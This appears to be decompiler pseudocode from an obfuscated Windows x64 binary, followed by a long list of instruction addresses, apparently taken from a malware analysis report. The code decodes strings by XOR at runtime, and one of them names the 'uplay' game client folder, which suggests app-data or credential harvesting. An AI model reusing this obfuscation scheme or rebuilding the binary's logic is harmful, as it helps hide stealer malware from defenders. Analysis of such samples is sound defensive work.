				r14d =  *((_t2221 | 0x00000003) + 0x68dc2a39) & 0x000000ff;
				_t2653 = _t2652 << 0x18;
				_t2621 = _t2620 << 0x10;
				_t1816 = (_t1808 << 0x00000008 | _t2562 | _t2621 | _t2653 | (_t2221 | 0x00000004) << 0x00000020 | _t2476 << 0x00000028 | (_t2221 | 0x00000006) << 0x00000030 | (_t2221 | 0x00000007) << 0x00000038) ^  *(0xf94de544 + _t2221);
				 *(_t2504 + _t2221 + 0x2d0) = _t1816;
				r9d = 0;
				if ((r9b & 0x00000001) != 0) goto 0x68b855f4;
				 *(_t2504 + 0x2e0) = 0x484d1d70 ^  *0x85D1DF85F94DE554;
				 *((short*)(_t2504 + 0x2e4)) =  *0x85D1DF85F94DE558 & 0x0000ffff ^ 0x000078a1;
				 *(_t2504 + 0x2e6) =  *0x85D1DF85F94DE55A & 0x000000ff ^ 0x0000008e;
				_t1239 = E00007FF77FF768BEFD87(0xf94de544, (_t2221 | 0x00000004) << 0x20);
				 *(_t2504 + 0xf0) = 0xf94de544;
				 *(_t2504 + 0xf8) = _t2221;
				asm("movaps xmm0, [esp+0x2d0]");
				asm("movups [edx], xmm0");
				 *((long long*)(_t2221 + 0xf)) =  *((intOrPtr*)(_t2504 + 0x2df));
				 *((long long*)(_t2504 + 0x100)) = 0x17;
				 *(_t2504 + 0x30) = 0x68db80a3;
				 *(_t2504 + 0x30) = 0x80cc0fdf;
				E00007FF77FF768B7CD85(_t1239, 8,  *(_t2504 + 0x30),  *(_t2504 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				_t2479 =  *0x7FF768DC2A50 ^  *0x41E8595980CC0FDF;
				 *(_t2504 + 0x30) = _t2479;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b8574f;
				E00007FF77FF768BEFD87(0x80cc0fdf, 0);
				_t2603 = _t2504 + 0x210;
				 *_t2603 = 0x80cc0fdf;
				 *((long long*)(_t2603 + 8)) = 0x68dc2a50;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2603 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				_t2564 =  *((intOrPtr*)(_t2504 + 0x1a8));
				if (_t2564 == 0) goto 0x68b857dd;
				if ( *(_t2504 + 0x1a0) == 0) goto 0x68b857dd;
				_t1242 = HeapFree(??, ??, ??);
				 *(_t2504 + 0x30) = "uplay\\";
				 *(_t2504 + 0x30) = 0xe447a61b;
				_t2225 =  *(_t2504 + 0x30);
				E00007FF77FF768B7E229(_t1242, 0,  *(_t2504 + 0x30), _t2225);
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x2d0], xmm0");
				r9b = 1;
				r8d =  *(_t2225 + 0x68dc2a70) & 0x000000ff;
				r11d =  *((_t2225 | 0x00000002) + 0x68dc2a70) & 0x000000ff;
				r14d =  *((_t2225 | 0x00000003) + 0x68dc2a70) & 0x000000ff;
				_t2654 = _t2653 << 0x18;
				_t2622 = _t2621 << 0x10;
				_t1824 = (_t1816 << 0x00000008 | _t2564 | _t2622 | _t2654 | (_t2225 | 0x00000004) << 0x00000020 | _t2479 << 0x00000028 | (_t2225 | 0x00000006) << 0x00000030 | (_t2225 | 0x00000007) << 0x00000038) ^  *(0xe447a61b + _t2225);
				 *(_t2504 + _t2225 + 0x2d0) = _t1824;
				r9d = 0;
				if ((r9b & 0x00000001) != 0) goto 0x68b8581e;
				 *(_t2504 + 0x2e0) = 0x87f436c8 ^  *0xE25571E6E447A62B;
				 *((short*)(_t2504 + 0x2e4)) =  *0xE25571E6E447A62F & 0x0000ffff ^ 0x0000fd9e;
				E00007FF77FF768BEFD87(0xe447a61b, (_t2225 | 0x00000004) << 0x20);
				 *(_t2504 + 0xf0) = 0xe447a61b;
				 *(_t2504 + 0xf8) = _t2225;
				asm("movaps xmm0, [esp+0x2d0]");
				asm("movups [edx], xmm0");
				 *((long long*)(_t2225 + 0xe)) =  *((intOrPtr*)(_t2504 + 0x2de));
				 *((long long*)(_t2504 + 0x100)) = 0x16;
				 *(_t2504 + 0x30) = 0x68dbfff0;
				 *(_t2504 + 0x30) = 0x34ecdd9e;
				E00007FF77FF768B7DC19( *(_t2504 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				_t2482 =  *0x7FF768DC2A86 ^  *0x77C07BC734ECDD9E;
				 *(_t2504 + 0x30) = _t2482;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b8596b;
				E00007FF77FF768BEFD87(0x34ecdd9e, 0);
				_t2604 = _t2504 + 0x210;
				 *_t2604 = 0x34ecdd9e;
				 *((long long*)(_t2604 + 8)) = 0x68dc2a86;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2604 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				_t2566 =  *((intOrPtr*)(_t2504 + 0x1a8));
				if (_t2566 == 0) goto 0x68b859f9;
				if ( *(_t2504 + 0x1a0) == 0) goto 0x68b859f9;
				_t1248 = HeapFree(??, ??, ??);
				 *(_t2504 + 0x30) = 0x68db5217;
				 *(_t2504 + 0x30) = 0xc807053;
				_t2229 =  *(_t2504 + 0x30);
				E00007FF77FF768B7C2EF(_t1248,  *(_t2504 + 0x30), _t2229);
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x2d0], xmm0");
				r9b = 1;
				r8d =  *(_t2229 + 0x68dc2aa6) & 0x000000ff;
				r11d =  *((_t2229 | 0x00000002) + 0x68dc2aa6) & 0x000000ff;
				r14d =  *((_t2229 | 0x00000003) + 0x68dc2aa6) & 0x000000ff;
				_t1832 = (_t1824 << 0x00000008 | _t2566 | _t2622 << 0x00000010 | _t2654 << 0x00000018 | (_t2229 | 0x00000004) << 0x00000020 | _t2482 << 0x00000028 | (_t2229 | 0x00000006) << 0x00000030 | (_t2229 | 0x00000007) << 0x00000038) ^  *(0xc807053 + _t2229);
				 *(_t2504 + _t2229 + 0x2d0) = _t1832;
				r9d = 0;
				if ((r9b & 0x00000001) != 0) goto 0x68b85a3a;
				 *(_t2504 + 0x2e0) = 0x18c40e30 ^  *0x66484DAA0C807063;
				 *((short*)(_t2504 + 0x2e4)) =  *0x66484DAA0C807067 & 0x0000ffff ^ 0x00001491;
				 *(_t2504 + 0x2e6) =  *0x66484DAA0C807069 & 0x000000ff ^ 0x0000004a;
				_t1252 = E00007FF77FF768BEFD87(0xc807053, (_t2229 | 0x00000004) << 0x20);
				 *(_t2504 + 0xf0) = 0xc807053;
				 *(_t2504 + 0xf8) = _t2229;
				asm("movaps xmm0, [esp+0x2d0]");
				asm("movups [edx], xmm0");
				 *((long long*)(_t2229 + 0xf)) =  *((intOrPtr*)(_t2504 + 0x2df));
				 *((long long*)(_t2504 + 0x100)) = 0x17;
				 *(_t2504 + 0x30) = 0x68db8863;
				 *(_t2504 + 0x30) = 0x6572eab;
				E00007FF77FF768B7D3C3(_t1252, 8,  *(_t2504 + 0x30),  *(_t2504 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2504 + 0x30) =  *0x7FF768DC2ABD ^  *0x36EFF67806572EAB;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b85b95;
				E00007FF77FF768BEFD87(0x6572eab, 0);
				_t2605 = _t2504 + 0x210;
				 *_t2605 = 0x6572eab;
				 *((long long*)(_t2605 + 8)) = 0x68dc2abd;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2605 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2504 + 0x1a8)) == 0) goto 0x68b85c23;
				if ( *(_t2504 + 0x1a0) == 0) goto 0x68b85c23;
				HeapFree(??, ??, ??);
				 *(_t2504 + 0x30) = 0x68db562c;
				 *(_t2504 + 0x30) = 0x7df5950d;
				_t2233 =  *(_t2504 + 0x30);
				0x68b7c838();
				E00007FF77FF768BEFD87(0x7df5950d,  *(_t2504 + 0x30));
				 *(_t2504 + 0xf0) = 0x7df5950d;
				 *(_t2504 + 0xf8) = _t2233;
				 *_t2233 = 0xef917bdf ^  *0x7df5950d;
				 *((long long*)(_t2504 + 0x100)) = 8;
				 *(_t2504 + 0x30) = 0x68dbac39;
				 *(_t2504 + 0x30) = 0xfacb1a78;
				0x68b7c81a();
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2504 + 0x30) =  *0x7FF768DC2ADD ^  *0x1C5E9D9CFACB1A78;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b85cc8;
				E00007FF77FF768BEFD87(0xfacb1a78, 0);
				_t2606 = _t2504 + 0x210;
				 *_t2606 = 0xfacb1a78;
				 *((long long*)(_t2606 + 8)) = 0x68dc2add;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2606 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2504 + 0x1a8)) == 0) goto 0x68b85d56;
				if ( *(_t2504 + 0x1a0) == 0) goto 0x68b85d56;
				HeapFree(??, ??, ??);
				 *(_t2504 + 0x30) = 0x68dc2726;
				 *(_t2504 + 0x30) = 0xb3f29f9c;
				_t2237 =  *(_t2504 + 0x30);
				E00007FF77FF768B7D312(0, 0xb3f29f9c,  *(_t2504 + 0x30), _t2237);
				E00007FF77FF768BEFD87(0xb3f29f9c,  *(_t2504 + 0x30));
				 *(_t2504 + 0xf0) = 0xb3f29f9c;
				 *(_t2504 + 0xf8) = _t2237;
				 *_t2237 = 0x9f2f92d9 ^  *0xb3f29f9c;
				 *((long long*)(_t2504 + 0x100)) = 8;
				 *(_t2504 + 0x30) = 0x68dbcecc;
				 *(_t2504 + 0x30) = 0x5c34c53f;
				E00007FF77FF768B7BE4E(0, 0x5c34c53f,  *(_t2504 + 0x30),  *(_t2504 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2504 + 0x30) =  *0x7FF768DC2AFD ^  *0xFC68DCF15C34C53F;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b85dfb;
				E00007FF77FF768BEFD87(0x5c34c53f, 0);
				_t2607 = _t2504 + 0x210;
				 *_t2607 = 0x5c34c53f;
				 *((long long*)(_t2607 + 8)) = 0x68dc2afd;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2607 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2504 + 0x1a8)) == 0) goto 0x68b85e89;
				if ( *(_t2504 + 0x1a0) == 0) goto 0x68b85e89;
				_t1263 = HeapFree(??, ??, ??);
				 *(_t2504 + 0x30) = 0x68dc050f;
				 *(_t2504 + 0x30) = 0xcd78d21a;
				_t2241 =  *(_t2504 + 0x30);
				E00007FF77FF768B7E2E1(_t1263, 0,  *(_t2504 + 0x30), _t2241);
				_t1265 = E00007FF77FF768BEFD87(0xcd78d21a,  *(_t2504 + 0x30));
				 *(_t2504 + 0xf0) = 0xcd78d21a;
				 *(_t2504 + 0xf8) = _t2241;
				 *_t2241 = 0xc5f71b7c ^  *0xcd78d21a;
				_t2241[1] = 0x4db26ef7 ^  *0x5E87F654CD78D222;
				 *((long long*)(_t2504 + 0x100)) = 0xc;
				 *(_t2504 + 0x30) = 0x68dc3799;
				 *(_t2504 + 0x30) = 0x9992eeac;
				E00007FF77FF768B7C2C8(_t1265, 0,  *(_t2504 + 0x30),  *(_t2504 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2504 + 0x30) =  *0x7FF768DC2B1D ^  *0x2C9534B59992EEAC;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b85f39;
				E00007FF77FF768BEFD87(0x9992eeac, 0);
				_t2608 = _t2504 + 0x210;
				 *_t2608 = 0x9992eeac;
				 *((long long*)(_t2608 + 8)) = 0x68dc2b1d;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2608 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2504 + 0x1a8)) == 0) goto 0x68b85fc7;
				if ( *(_t2504 + 0x1a0) == 0) goto 0x68b85fc7;
				_t1268 = HeapFree(??, ??, ??);
				 *(_t2504 + 0x30) = 0x68dbe212;
				 *(_t2504 + 0x30) = 0xc6df36eb;
				_t2245 =  *(_t2504 + 0x30);
				E00007FF77FF768B7CA55(_t1268, 0,  *(_t2504 + 0x30), _t2245);
				_t1270 = E00007FF77FF768BEFD87(0xc6df36eb,  *(_t2504 + 0x30));
				 *(_t2504 + 0xf0) = 0xc6df36eb;
				 *(_t2504 + 0xf8) = _t2245;
				_t2245[0] =  *0x2C5A6B38C6DF36EF & 0x0000ffff ^ 0x0000f9af;
				 *_t2245 = 0x93e981a1;
				 *((long long*)(_t2504 + 0x100)) = 6;
				 *(_t2504 + 0x30) = 0x68db5821;
				 *(_t2504 + 0x30) = 0xf7ffd8fe;
				E00007FF77FF768B7DF8B(_t1270, 0,  *(_t2504 + 0x30),  *(_t2504 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2504 + 0x30) =  *0x7FF768DC2B3D ^  *0x164C142CF7FFD8FE;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b86076;
				E00007FF77FF768BEFD87(0xf7ffd8fe, 0);
				_t2609 = _t2504 + 0x210;
				 *_t2609 = 0xf7ffd8fe;
				 *((long long*)(_t2609 + 8)) = 0x68dc2b3d;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2609 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2504 + 0x1a8)) == 0) goto 0x68b86104;
				if ( *(_t2504 + 0x1a0) == 0) goto 0x68b86104;
				_t1273 = HeapFree(??, ??, ??);
				 *(_t2504 + 0x30) = 0x68dbb8f6;
				 *(_t2504 + 0x30) = 0x29019584;
				_t2249 =  *(_t2504 + 0x30);
				E00007FF77FF768B7E285(_t1273, 0,  *(_t2504 + 0x30), _t2249);
				_t1761 = _t1832 << 0x30;
				E00007FF77FF768BEFD87(_t1761,  *(_t2504 + 0x30));
				 *(_t2504 + 0xf0) = _t1761;
				 *(_t2504 + 0xf8) = _t2249;
				_t2249[0] = ( *0xD599E13C2901958A & 0x000000ff ^ 0x000000b7) & 0x000000ff;
				 *_t2249 =  *0x29019584;
				_t2249[0] =  *0xD599E13C29019588 & 0x0000ffff ^ 0x0000016b;
				 *((long long*)(_t2504 + 0x100)) = 7;
				 *(_t2504 + 0x30) = 0x68dc46ef;
				 *(_t2504 + 0x30) = 0xe6584df4;
				0x68b7d8b0();
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2504 + 0x30) =  *0x7FF768DC2B5D ^  *0x4297C87EE6584DF4;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b861d1;
				E00007FF77FF768BEFD87(0xe6584df4, 0);
				_t2610 = _t2504 + 0x210;
				 *_t2610 = 0xe6584df4;
				 *((long long*)(_t2610 + 8)) = 0x68dc2b5d;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2610 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2504 + 0x1a8)) == 0) goto 0x68b8625f;
				if ( *(_t2504 + 0x1a0) == 0) goto 0x68b8625f;
				HeapFree(??, ??, ??);
				 *(_t2504 + 0x30) = 0x68db667a;
				 *(_t2504 + 0x30) = 0x97be8f0b;
				_t2253 =  *(_t2504 + 0x30);
				0x68b7c8e4();
				_t1278 = E00007FF77FF768BEFD87(0x97be8f0b,  *(_t2504 + 0x30));
				 *(_t2504 + 0xf0) = 0x97be8f0b;
				 *(_t2504 + 0xf8) = _t2253;
				_t2253[0] =  *0x33C2156597BE8F0F & 0x0000ffff ^ 0x00004cc5;
				 *_t2253 =  *0x97be8f0b;
				 *((long long*)(_t2504 + 0x100)) = 6;
				 *(_t2504 + 0x30) = 0x68dbf7d8;
				 *(_t2504 + 0x30) = 0x57c508d2;
				E00007FF77FF768B7D384(_t1278, 0,  *(_t2504 + 0x30),  *(_t2504 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2504 + 0x30) =  *0x7FF768DC2B7D ^  *0xF8D325B357C508D2;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b8630d;
				E00007FF77FF768BEFD87(0x57c508d2, 0);
				_t2611 = _t2504 + 0x210;
				 *_t2611 = 0x57c508d2;
				 *((long long*)(_t2611 + 8)) = 0x68dc2b7d;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2611 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2504 + 0x1a8)) == 0) goto 0x68b8639b;
				if ( *(_t2504 + 0x1a0) == 0) goto 0x68b8639b;
				HeapFree(??, ??, ??);
				 *(_t2504 + 0x30) = 0x68dbe607;
				 *(_t2504 + 0x30) = 0x712c1c8f;
				_t2257 =  *(_t2504 + 0x30);
				E00007FF77FF768B7E304(_t2257);
				E00007FF77FF768BEFD87(0x712c1c8f,  *(_t2504 + 0x30));
				 *(_t2504 + 0xf0) = 0x712c1c8f;
				 *(_t2504 + 0xf8) = _t2257;
				_t2257[0] =  *0x9E05AFFD712C1C93 & 0x0000ffff ^ 0x000036bd;
				 *_t2257 =  *0x712c1c8f;
				 *((long long*)(_t2504 + 0x100)) = 6;
				 *(_t2504 + 0x30) = 0x68db9b3d;
				 *(_t2504 + 0x30) = 0xe23316d8;
				0x68b7c65d();
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2504 + 0x30) =  *0x7FF768DC2B9D ^  *0x6210CA38E23316D8;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b86449;
				E00007FF77FF768BEFD87(0xe23316d8, 0);
				_t2612 = _t2504 + 0x210;
				 *_t2612 = 0xe23316d8;
				 *((long long*)(_t2612 + 8)) = 0x68dc2b9d;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2612 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2504 + 0x1a8)) == 0) goto 0x68b864d7;
				if ( *(_t2504 + 0x1a0) == 0) goto 0x68b864d7;
				_t1284 = HeapFree(??, ??, ??);
				 *(_t2504 + 0x30) = 0x68db6404;
				 *(_t2504 + 0x30) = 0x3cc9fb2e;
				_t2261 =  *(_t2504 + 0x30);
				E00007FF77FF768B7BEA6(_t1284, 0,  *(_t2504 + 0x30), _t2261);
				_t1775 = _t1832 << 0x30;
				_t1286 = E00007FF77FF768BEFD87(_t1775,  *(_t2504 + 0x30));
				 *(_t2504 + 0xf0) = _t1775;
				 *(_t2504 + 0xf8) = _t2261;
				_t2261[0] = ( *0x7593BCC93CC9FB34 & 0x000000ff ^ 0x0000008d) & 0x000000ff;
				 *_t2261 =  *0x3cc9fb2e;
				_t2261[0] =  *0x7593BCC93CC9FB32 & 0x0000ffff ^ 0x000015d0;
				 *((long long*)(_t2504 + 0x100)) = 7;
				 *(_t2504 + 0x30) = 0x68dba22d;
				 *(_t2504 + 0x30) = 0xff9ea051;
				E00007FF77FF768B7E15C(_t1286, 0,  *(_t2504 + 0x30),  *(_t2504 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2504 + 0x30) =  *0x7FF768DC2BBD ^  *0x21DF08BAFF9EA051;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b865a4;
				E00007FF77FF768BEFD87(0xff9ea051, 0);
				_t2613 = _t2504 + 0x210;
				 *_t2613 = 0xff9ea051;
				 *((long long*)(_t2613 + 8)) = 0x68dc2bbd;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2613 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2504 + 0x1a8)) == 0) goto 0x68b86632;
				if ( *(_t2504 + 0x1a0) == 0) goto 0x68b86632;
				HeapFree(??, ??, ??);
				 *(_t2504 + 0x30) = 0x68dbba7b;
				 *(_t2504 + 0x30) = 0xe8eb8cc6;
				_t2265 =  *(_t2504 + 0x30);
				0x68b7c5be();
				_t1290 = E00007FF77FF768BEFD87(0xe8eb8cc6,  *(_t2504 + 0x30));
				 *(_t2504 + 0xf0) = 0xe8eb8cc6;
				 *(_t2504 + 0xf8) = _t2265;
				 *_t2265 = 0xb89fcbe7 ^  *0xe8eb8cc6;
				_t2265[1] = 0x27ae80ca ^  *0x72369D9BE8EB8CCE;
				_t2265[1] =  *0x72369D9BE8EB8CD2 ^ 0x00000031;
				 *((long long*)(_t2504 + 0x100)) = 0xd;
				 *(_t2504 + 0x30) = 0x68dbc1b3;
				 *(_t2504 + 0x30) = 0xe4a3e0bb;
				E00007FF77FF768B7E0F6(_t1290, 0,  *(_t2504 + 0x30),  *(_t2504 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2504 + 0x30) =  *0x7FF768DC2BDD ^  *0x6D7FDC16E4A3E0BB;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b866eb;
				E00007FF77FF768BEFD87(0xe4a3e0bb, 0);
				_t2614 = _t2504 + 0x210;
				 *_t2614 = 0xe4a3e0bb;
				 *((long long*)(_t2614 + 8)) = 0x68dc2bdd;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2614 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2504 + 0x1a8)) == 0) goto 0x68b86779;
				if ( *(_t2504 + 0x1a0) == 0) goto 0x68b86779;
				_t1293 = HeapFree(??, ??, ??);
				 *(_t2504 + 0x30) = 0x68dc05fc;
				 *(_t2504 + 0x30) = 0x402667f0;
				_t2269 =  *(_t2504 + 0x30);
				E00007FF77FF768B7CAF7(_t1293, 0,  *(_t2504 + 0x30), _t2269);
				E00007FF77FF768BEFD87(0x402667f0,  *(_t2504 + 0x30));
				 *(_t2504 + 0xf0) = 0x402667f0;
				 *(_t2504 + 0xf8) = _t2269;
				_t2269[0] =  *0x37DD570D402667F4 ^ 0x000000a0;
				 *_t2269 = 0x95c71374;
				 *((long long*)(_t2504 + 0x100)) = 5;
				 *(_t2504 + 0x30) = 0x68dc0e33;
			}























































































































































































                                                                                          0x7ff768b833e2
                                                                                          0x7ff768b833eb
                                                                                          0x7ff768b833f2
                                                                                          0x7ff768b833f5
                                                                                          0x7ff768b833fa
                                                                                          0x7ff768b83406
                                                                                          0x7ff768b8340b
                                                                                          0x7ff768b8341b
                                                                                          0x7ff768b8341e
                                                                                          0x7ff768b83421
                                                                                          0x7ff768b83440
                                                                                          0x7ff768b83445
                                                                                          0x7ff768b8344d
                                                                                          0x7ff768b83455
                                                                                          0x7ff768b83458
                                                                                          0x7ff768b8345b
                                                                                          0x7ff768b83467
                                                                                          0x7ff768b83471
                                                                                          0x7ff768b83476
                                                                                          0x7ff768b8347e
                                                                                          0x7ff768b83486
                                                                                          0x7ff768b83492
                                                                                          0x7ff768b83496
                                                                                          0x7ff768b8349f
                                                                                          0x7ff768b834ab
                                                                                          0x7ff768b834b6
                                                                                          0x7ff768b834ba
                                                                                          0x7ff768b834c2
                                                                                          0x7ff768b834c5
                                                                                          0x7ff768b834cd
                                                                                          0x7ff768b834d1
                                                                                          0x7ff768b834e1
                                                                                          0x7ff768b834e9
                                                                                          0x7ff768b834f0
                                                                                          0x7ff768b834f5
                                                                                          0x7ff768b8350b
                                                                                          0x7ff768b8351a
                                                                                          0x7ff768b83528
                                                                                          0x7ff768b83532
                                                                                          0x7ff768b83535
                                                                                          0x7ff768b8353a
                                                                                          0x7ff768b83544
                                                                                          0x7ff768b83556
                                                                                          0x7ff768b8355e
                                                                                          0x7ff768b83561
                                                                                          0x7ff768b8356a
                                                                                          0x7ff768b83580
                                                                                          0x7ff768b83593
                                                                                          0x7ff768b83599
                                                                                          0x7ff768b835a3
                                                                                          0x7ff768b835ab
                                                                                          0x7ff768b835ad
                                                                                          0x7ff768b835b9
                                                                                          0x7ff768b835c7
                                                                                          0x7ff768b835ca
                                                                                          0x7ff768b835d7
                                                                                          0x7ff768b835dc
                                                                                          0x7ff768b835df
                                                                                          0x7ff768b835e4
                                                                                          0x7ff768b835e7
                                                                                          0x7ff768b835ee
                                                                                          0x7ff768b835f5
                                                                                          0x7ff768b835f8
                                                                                          0x7ff768b835fb
                                                                                          0x7ff768b835ff
                                                                                          0x7ff768b83603
                                                                                          0x7ff768b83607
                                                                                          0x7ff768b8360b
                                                                                          0x7ff768b83614
                                                                                          0x7ff768b83621
                                                                                          0x7ff768b83625
                                                                                          0x7ff768b8362a
                                                                                          0x7ff768b83632
                                                                                          0x7ff768b8363a
                                                                                          0x7ff768b8363e
                                                                                          0x7ff768b8364a
                                                                                          0x7ff768b83652
                                                                                          0x7ff768b8365a
                                                                                          0x7ff768b83662
                                                                                          0x7ff768b8366d
                                                                                          0x7ff768b83673
                                                                                          0x7ff768b8367d
                                                                                          0x7ff768b8368a
                                                                                          0x7ff768b83697
                                                                                          0x7ff768b836b3
                                                                                          0x7ff768b836bb
                                                                                          0x7ff768b836c2
                                                                                          0x7ff768b836d5
                                                                                          0x7ff768b836dd
                                                                                          0x7ff768b836ed
                                                                                          0x7ff768b836f8
                                                                                          0x7ff768b836fe
                                                                                          0x7ff768b83706
                                                                                          0x7ff768b8370e
                                                                                          0x7ff768b83713
                                                                                          0x7ff768b83718
                                                                                          0x7ff768b83721
                                                                                          0x7ff768b83726
                                                                                          0x7ff768b8372e
                                                                                          0x7ff768b83736
                                                                                          0x7ff768b8373e
                                                                                          0x7ff768b83746
                                                                                          0x7ff768b8374e
                                                                                          0x7ff768b8375c
                                                                                          0x7ff768b83762
                                                                                          0x7ff768b83762
                                                                                          0x7ff768b8376e
                                                                                          0x7ff768b83771
                                                                                          0x7ff768b83779
                                                                                          0x7ff768b83781
                                                                                          0x7ff768b83791
                                                                                          0x7ff768b83795
                                                                                          0x7ff768b8379c
                                                                                          0x7ff768b837a2
                                                                                          0x7ff768b837a8
                                                                                          0x7ff768b837ad
                                                                                          0x7ff768b837b2
                                                                                          0x7ff768b837b8
                                                                                          0x7ff768b837bd
                                                                                          0x7ff768b837c2
                                                                                          0x7ff768b837c7
                                                                                          0x7ff768b837d5
                                                                                          0x7ff768b837e1
                                                                                          0x7ff768b837e7
                                                                                          0x7ff768b837fa
                                                                                          0x7ff768b837fa
                                                                                          0x7ff768b83810
                                                                                          0x7ff768b8381b
                                                                                          0x7ff768b83838
                                                                                          0x7ff768b83845
                                                                                          0x7ff768b83850
                                                                                          0x7ff768b83858
                                                                                          0x7ff768b83860
                                                                                          0x7ff768b8386e
                                                                                          0x7ff768b83873
                                                                                          0x7ff768b83886
                                                                                          0x7ff768b83889
                                                                                          0x7ff768b8388e
                                                                                          0x7ff768b83897
                                                                                          0x7ff768b838a1
                                                                                          0x7ff768b838a5
                                                                                          0x7ff768b838a9
                                                                                          0x7ff768b838ad
                                                                                          0x7ff768b838b1
                                                                                          0x7ff768b838b9
                                                                                          0x7ff768b838c1
                                                                                          0x7ff768b838c9
                                                                                          0x7ff768b838d5
                                                                                          0x7ff768b838dd
                                                                                          0x7ff768b838f5
                                                                                          0x7ff768b838fa
                                                                                          0x7ff768b83907
                                                                                          0x7ff768b8390d
                                                                                          0x7ff768b8391a
                                                                                          0x7ff768b8392a
                                                                                          0x7ff768b8392f
                                                                                          0x7ff768b83933
                                                                                          0x7ff768b83937
                                                                                          0x7ff768b83940
                                                                                          0x7ff768b83948
                                                                                          0x7ff768b83954
                                                                                          0x7ff768b8395f
                                                                                          0x7ff768b8396a
                                                                                          0x7ff768b83970
                                                                                          0x7ff768b83978
                                                                                          0x7ff768b8397e
